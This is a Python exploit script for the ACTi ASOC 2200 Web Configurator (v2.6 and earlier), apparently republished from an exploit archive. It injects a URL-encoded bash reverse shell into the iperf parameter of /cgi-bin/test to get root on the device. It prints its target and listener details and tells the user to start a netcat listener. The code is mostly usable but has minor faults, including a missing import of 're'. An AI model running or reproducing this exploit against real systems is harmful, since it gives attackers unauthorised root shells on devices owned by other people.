#!/usr/bin/env python
# Title: ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution
# Link to Original: http://packetstormsecurity.org/files/view/99414/actiasoc-exec.txt
# Author: infodox
# Website: http://insecurety.net/
# Twitter: twitter.com/info_dox
# Usage: ./actipwn.py <target> <listener host> <listener port>
import sys
import urllib2

def banner():
    print '''
       _____          __  .____________                  
      /  _  \   _____/  |_|__\______   \__  _  ______    
     /  /_\  \_/ ___\   __\  ||     ___/\ \/ \/ /    \   
    /    |    \  \___|  | |  ||    |     \     /   |  \  
    \____|__  /\___  >__| |__||____|      \/\_/|___|  /  
            \/     \/                               \/   \n
ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution
	'''
	
def usage():
    print '''
	./pwn <target> <listener host> <listener port>
	Exploit gives a reverse shell so make sure your listener is running netcat.
	i.e. nc -lvvp 443 would start a listener on port 443
	Also, lrn2python!
	'''# %(sys.argv(0))

banner()
if len(sys.argv) != 4:
    usage()
    sys.exit(1)
	
target = sys.argv[1]
lhost = sys.argv[2]
lport = sys.argv[3]

def pwn(target, lhost, lport):
    print "[*] Target Host: %s " %(target)
    print "[*] Listener Host: %s " %(lhost)
    print "[*] Listener Port: %s " %(lport)
    payloadstage1 = '''bash%20-i%20%3E%26%20/dev/tcp/'''
    payloadstage2 = '''%s/%s''' %(lhost, lport)
    payloadstage3 = '''%200%3E%261'''
    payload = payloadstage1 + payloadstage2 + payloadstage3
    try:
        target = "http://"+target
	root = urllib2.urlopen(target+"/cgi-bin/test?iperf=;"+payload)
	root = root.read()
	if re.findall("execute", root):
		print "[!] Exploit seems to have worked. Enjoy your shell.\n"
	else:
		print "[-] Failed, ragequit!"
		sys.exit(0)
    except(KeyboardInterrupt, SystemExit):
	    pass
		
pwn(target, lhost, lport)
